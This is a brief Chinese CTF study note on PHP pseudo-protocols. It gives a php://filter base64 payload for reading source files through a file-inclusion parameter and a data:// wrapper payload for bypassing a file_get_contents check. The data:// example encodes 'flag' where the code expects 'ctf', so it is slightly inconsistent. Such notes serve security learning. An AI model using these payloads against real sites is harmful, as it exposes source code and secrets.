常见伪协议
filter伪协议
一般用来读取文件
?file=php://filter/convert.base64-encode/resource=index.php
data伪协议
if(isset($text)&&(file_get_contents($text,'r')==="ctf")){
echo $flag;
}
在这种情况下,file_get_contents()要求读取文件内容到一个字符串,但这里没没有文件,而要读取text变量,使用data伪协议绕过
?text=data://text/plain;base64,ZmxhZw==